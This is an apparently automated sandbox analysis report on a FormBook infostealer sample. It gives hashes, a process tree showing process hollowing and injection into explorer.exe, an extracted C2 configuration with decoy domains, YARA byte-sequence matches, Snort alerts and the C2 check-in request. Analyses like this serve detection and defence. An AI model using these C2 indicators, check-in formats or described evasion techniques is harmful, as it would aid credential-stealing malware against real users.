Loading ...

Play interactive tourEdit tour

Windows Analysis Report 9thuIDnsFV

Overview

General Information

Sample Name:9thuIDnsFV (renamed file extension from none to exe)
Analysis ID:452499
MD5:0e715db2198ff670f4bf0e88e0e9b547
SHA1:2de5030a9261655e5879e4faba7b5e79d1dd483e
SHA256:4dc8cb12314311a3bf1b1afa5cc5483284fda573f18c15ab0fef18b7b9ef9f98
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 9thuIDnsFV.exe (PID: 6324 cmdline: 'C:\Users\user\Desktop\9thuIDnsFV.exe' MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
    • 9thuIDnsFV.exe (PID: 5860 cmdline: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 4868 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 3520 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.containerflippers.com/np0c/"], "decoy": ["spartansurebets.com", "threelakestradingco.com", "metaspace.global", "zjenbao.com", "directlyincluded.press", "peterchadri.com", "learnhousebreaking.com", "wonobattle.online", "leadate.com", "shebafarmscali.com", "top4thejob.online", "awakeyourfaith.com", "bedford-st.com", "lolwhats.com", "cucurumbel.com", "lokalbazaar.com", "matter.pro", "eastcountyanimalrescue.com", "musesgirl.com", "noordinarydairy.com", "saigonstar2.com", "farmacias-aranda.com", "fjzzck.com", "createandelevate.solutions", "australiavapeoil.com", "imperfectlymassabella.com", "criminalmindeddesign.com", "silverstoneca.com", "scotlandpropertygroup.com", "3dvbuild.com", "privatebeautysuites.com", "driplockerstore.com", "rcdesigncompany.com", "2141cascaderdsw.com", "mybbblog.com", "bodyambrosia.com", "solitudeblog.com", "coworkingofficespaces.com", "9999cpa.com", "flipwo.com", "dynamicfitnesslife.store", "anandsharmah.com", "afyz-jf7y.net", "erikagrandstaff.com", "pumpfoil.com", "bodurm.com", "goldlifetime.com", "a1organ.com", "akomandr.com", "hsavvysupply.com", "dyvyn.com", "bizlikeabosslady.network", "livein.space", "helpafounderout.com", "orbmena.com", "mrrodgersrealty.com", "roxhomeswellington.com", "klimareporter.com", "1040fourthst405.com", "blackbuiltbusinesses.com", "solidswim.com", "lordetkinlik3.com", "gardencontainerbar.com", "viperporn.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0xa238:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0xa4b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x32258:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x324d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15fd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x3dff5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15ac1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x3dae1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x160d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x3e0f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1624f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x3e26f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaeca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x32eea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x14d3c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x3cd5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xbbc3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x33be3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1bc77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x43c97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1cc7a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18d59:$sqlite3step: 68 34 1C 7B E1
    • 0x18e6c:$sqlite3step: 68 34 1C 7B E1
    • 0x40d79:$sqlite3step: 68 34 1C 7B E1
    • 0x40e8c:$sqlite3step: 68 34 1C 7B E1
    • 0x18d88:$sqlite3text: 68 38 2A 90 C5
    • 0x18ead:$sqlite3text: 68 38 2A 90 C5
    • 0x40da8:$sqlite3text: 68 38 2A 90 C5
    • 0x40ecd:$sqlite3text: 68 38 2A 90 C5
    • 0x18d9b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18ec3:$sqlite3blob: 68 53 D8 7F 8C
    • 0x40dbb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x40ee3:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.2.9thuIDnsFV.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        10.2.9thuIDnsFV.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        10.2.9thuIDnsFV.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.2.9thuIDnsFV.exe.45b0350.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.9thuIDnsFV.exe.45b0350.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9bf58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9c1d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xa7cf5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0xa77e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0xa7df7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0xa7f6f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x9cbea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0xa6a5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9d8e3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0xad997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0xae99a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.containerflippers.com/np0c/"], "decoy": ["spartansurebets.com", "threelakestradingco.com", "metaspace.global", "zjenbao.com", "directlyincluded.press", "peterchadri.com", "learnhousebreaking.com", "wonobattle.online", "leadate.com", "shebafarmscali.com", "top4thejob.online", "awakeyourfaith.com", "bedford-st.com", "lolwhats.com", "cucurumbel.com", "lokalbazaar.com", "matter.pro", "eastcountyanimalrescue.com", "musesgirl.com", "noordinarydairy.com", "saigonstar2.com", "farmacias-aranda.com", "fjzzck.com", "createandelevate.solutions", "australiavapeoil.com", "imperfectlymassabella.com", "criminalmindeddesign.com", "silverstoneca.com", "scotlandpropertygroup.com", "3dvbuild.com", "privatebeautysuites.com", "driplockerstore.com", "rcdesigncompany.com", "2141cascaderdsw.com", "mybbblog.com", "bodyambrosia.com", "solitudeblog.com", "coworkingofficespaces.com", "9999cpa.com", "flipwo.com", "dynamicfitnesslife.store", "anandsharmah.com", "afyz-jf7y.net", "erikagrandstaff.com", "pumpfoil.com", "bodurm.com", "goldlifetime.com", "a1organ.com", "akomandr.com", "hsavvysupply.com", "dyvyn.com", "bizlikeabosslady.network", "livein.space", "helpafounderout.com", "orbmena.com", "mrrodgersrealty.com", "roxhomeswellington.com", "klimareporter.com", "1040fourthst405.com", "blackbuiltbusinesses.com", "solidswim.com", "lordetkinlik3.com", "gardencontainerbar.com", "viperporn.net"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeReversingLabs: Detection: 23%
          Multi AV Scanner detection for submitted fileShow sources
          Source: 9thuIDnsFV.exeVirustotal: Detection: 38%Perma Link
          Source: 9thuIDnsFV.exeReversingLabs: Detection: 23%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.2.9thuIDnsFV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.9thuIDnsFV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY
          Source: 10.2.9thuIDnsFV.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019CFDA0 BasepCopyEncryption,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B7D72 BasepCopyEncryption,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D8E00 BasepCopyEncryption,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D2E3E BasepCopyEncryption,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B2250 BasepCopyEncryption,
          Source: 9thuIDnsFV.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 9thuIDnsFV.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000E.00000000.455604694.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 9thuIDnsFV.exe, 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdb source: 9thuIDnsFV.exe, 0000000A.00000002.498749026.0000000001DB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 9thuIDnsFV.exe, 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: 9thuIDnsFV.exe, 0000000A.00000002.498749026.0000000001DB0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000E.00000000.455604694.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 5.79.68.101:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 5.79.68.101:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 5.79.68.101:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.containerflippers.com/np0c/
          Source: global trafficHTTP traffic detected: GET /np0c/?iN=5jalxB&a0DTBtU=a9fK2iRL7rM/iNgaQ8e4NUwl6BbikcR8OekOj0TYIdin2efeiFW0Z5kC5Xa/O1Kzq37GlajMhw== HTTP/1.1Host: www.driplockerstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: LEASEWEB-NL-AMS-01NetherlandsNL LEASEWEB-NL-AMS-01NetherlandsNL
          Source: global trafficHTTP traffic detected: GET /np0c/?iN=5jalxB&a0DTBtU=a9fK2iRL7rM/iNgaQ8e4NUwl6BbikcR8OekOj0TYIdin2efeiFW0Z5kC5Xa/O1Kzq37GlajMhw== HTTP/1.1Host: www.driplockerstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.driplockerstore.com
          Source: 9thuIDnsFV.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: 9thuIDnsFV.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
          Source: 9thuIDnsFV.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
          Source: 9thuIDnsFV.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: 9thuIDnsFV.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: 9thuIDnsFV.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
          Source: 9thuIDnsFV.exeString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
          Source: 9thuIDnsFV.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: 9thuIDnsFV.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: 9thuIDnsFV.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
          Source: 9thuIDnsFV.exeString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
          Source: 9thuIDnsFV.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: 9thuIDnsFV.exe, 00000001.00000003.330013890.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://en.w
          Source: 9thuIDnsFV.exe, 00000001.00000003.329336409.000000000616B000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 9thuIDnsFV.exeString found in binary or memory: http://ocsp.digicert.com0C
          Source: 9thuIDnsFV.exeString found in binary or memory: http://ocsp.digicert.com0H
          Source: 9thuIDnsFV.exeString found in binary or memory: http://ocsp.digicert.com0I
          Source: 9thuIDnsFV.exeString found in binary or memory: http://ocsp.digicert.com0O
          Source: wlanext.exe, 00000014.00000002.599683459.0000000003D9F000.00000004.00000001.sdmpString found in binary or memory: http://survey-smiles.com
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: 9thuIDnsFV.exe, 00000001.00000003.336235888.0000000006173000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.336179079.0000000006173000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
          Source: explorer.exe, 0000000E.00000000.465503164.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: 9thuIDnsFV.exe, 00000001.00000003.334443520.000000000616D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: 9thuIDnsFV.exe, 00000001.00000003.333715053.000000000616D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com.
          Source: 9thuIDnsFV.exe, 00000001.00000003.334802978.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
          Source: 9thuIDnsFV.exe, 00000001.00000003.333788508.000000000616D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comaF
          Source: 9thuIDnsFV.exe, 00000001.00000003.334955370.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comal
          Source: 9thuIDnsFV.exe, 00000001.00000003.334171892.000000000616D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comams
          Source: 9thuIDnsFV.exe, 00000001.00000003.334802978.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comc
          Source: 9thuIDnsFV.exe, 00000001.00000003.334310160.000000000616D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comces
          Source: 9thuIDnsFV.exe, 00000001.00000003.334802978.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comcr
          Source: 9thuIDnsFV.exe, 00000001.00000003.334264597.000000000616D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.come
          Source: 9thuIDnsFV.exe, 00000001.00000003.334171892.000000000616D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comes
          Source: 9thuIDnsFV.exe, 00000001.00000003.333715053.000000000616D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comexc
          Source: 9thuIDnsFV.exe, 00000001.00000003.334215573.000000000616D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comic
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: 9thuIDnsFV.exe, 00000001.00000003.333715053.000000000616D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comlt
          Source: 9thuIDnsFV.exe, 00000001.00000003.334443520.000000000616D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
          Source: 9thuIDnsFV.exe, 00000001.00000003.334443520.000000000616D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comopsz
          Source: 9thuIDnsFV.exe, 00000001.00000003.334955370.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comroa
          Source: 9thuIDnsFV.exeString found in binary or memory: http://www.digicert.com/CPS0
          Source: 9thuIDnsFV.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: 9thuIDnsFV.exe, 00000001.00000003.341157570.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers#
          Source: 9thuIDnsFV.exe, 00000001.00000003.339414645.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers$
          Source: 9thuIDnsFV.exe, 00000001.00000003.338972632.000000000616B000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.338849647.0000000006171000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: 9thuIDnsFV.exe, 00000001.00000003.340799548.000000000618E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: 9thuIDnsFV.exe, 00000001.00000003.339998468.000000000618E000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.339943360.000000000616B000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: 9thuIDnsFV.exe, 00000001.00000003.339513065.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers5
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.338914369.0000000006171000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: 9thuIDnsFV.exe, 00000001.00000003.339673222.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersa
          Source: 9thuIDnsFV.exe, 00000001.00000003.339673222.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersers5
          Source: 9thuIDnsFV.exe, 00000001.00000003.338914369.0000000006171000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersp
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: 9thuIDnsFV.exe, 00000001.00000003.333344719.000000000616B000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: 9thuIDnsFV.exe, 00000001.00000003.331470049.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: 9thuIDnsFV.exe, 00000001.00000003.333344719.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn6
          Source: 9thuIDnsFV.exe, 00000001.00000003.332290487.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnMic
          Source: 9thuIDnsFV.exe, 00000001.00000003.332056051.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnht
          Source: 9thuIDnsFV.exe, 00000001.00000003.333344719.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnld
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
